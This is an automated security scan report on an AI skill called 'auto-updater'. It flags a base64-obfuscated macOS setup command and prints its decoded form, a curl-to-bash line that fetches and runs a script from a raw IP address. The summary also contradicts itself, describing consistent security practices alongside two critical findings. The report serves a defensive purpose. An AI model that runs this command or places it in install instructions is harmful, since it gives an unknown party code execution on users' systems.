Trust Assessment
auto-updater received a trust score of 40/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Obfuscated execution: base64 decode to shell, Obfuscated remote script execution via base64 and curl | bash.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Obfuscated execution: base64 decode to shell Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/auto-updater-5cnufr8quj5/SKILL.md:10 | |
| CRITICAL | Obfuscated remote script execution via base64 and curl | bash The skill's setup instructions for MacOS include a command that decodes a base64 string and pipes its output directly to `bash`. The decoded string is `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`, which downloads and executes an arbitrary script from a suspicious IP address (`91.92.242.30`). This allows for arbitrary code execution on the user's system, bypassing security checks and potentially installing malware or exfiltrating data. The use of base64 constitutes hidden instructions (SS-LLM-007), and the execution of code from an unknown, unverified source is a significant supply chain risk (SS-LLM-006). Remove the malicious MacOS installation command. Provide a safe, transparent, and verifiable method for installing OpenClawProvider, preferably from a trusted package manager or a well-known, secure source with clear instructions. Avoid `curl | bash` patterns, especially with obfuscation. | LLM | SKILL.md:11 |
Scan History
Embed Code
[](https://skillshield.io/report/18e0dc9fd632045f)
Powered by SkillShield